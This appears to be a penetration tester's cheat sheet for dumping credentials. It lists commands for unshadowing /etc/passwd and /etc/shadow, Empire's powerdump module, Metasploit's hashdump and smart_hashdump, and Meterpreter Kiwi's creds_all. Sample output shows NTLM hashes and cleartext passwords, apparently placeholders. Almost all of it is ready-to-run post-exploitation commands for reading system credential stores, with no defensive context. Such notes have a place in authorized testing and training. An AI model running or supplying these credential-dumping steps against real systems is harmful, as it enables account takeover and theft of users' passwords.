Get Hashes

Hash-identifier

> hashid 123XYZ...
> hash-identifier

unshadow (john)

unshadow /etc/passwd /etc/shadow > combined.txt

Empire on Windows

(Empire: powershell/credentials/powerdump) > run
[*] Tasked DHX9MABL to run TASK_CMD_JOB
[*] Agent DHX9MABL tasked with task ID 1
[*] Tasked agent agentHIGH to run module powershell/credentials/powerdump
(Empire: powershell/credentials/powerdump) > [*] Agent DHX9MABL returned results.

Administrator:500:blahblahlongstring123xyzabclongstring123abcxyz123abcxyzaa:::
mike:1202:blahblahlongstring123xyzabclongstring123abcxyz123abcxyzaa:::

Metasploit - hashdump

smart_hashdump  ..sometimes isn't so smart
hashdump        ..try both!!!!!

meterpreter > run post/windows/gather/smart_hashdump
meterpreter > run post/windows/gather/hashdump

Meterpreter Kiwi

meterpreter > load kiwi
meterpreter > creds_all

[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain   NTLM                              SHA1
--------       ------   ----                              ----
Administrator  TARGET   abxlkaselkbjlcije89893289823sers  lkjawleijviw989w8evw98va9898wer9w8e42893
KALI$          TARGET   kleilvkejlaijlsijej3902930923409  0902349824lkajslkjvliaejlwejoifjwf092039

wdigest credentials
===================

Username       Domain   Password
--------       ------   --------
(null)         (null)   (null)
Administrator  TARGET   secretPW
KALI$          TARGET   youFOUNDmypaxxwurd

kerberos credentials
====================

Username       Domain        Password
--------       ------        --------
(null)         (null)        (null)
Administrator  TARGET        (null)
KALI$          target.local  youFOUNDmypaxxwurd
kali   $       target.LOCAL  (null)
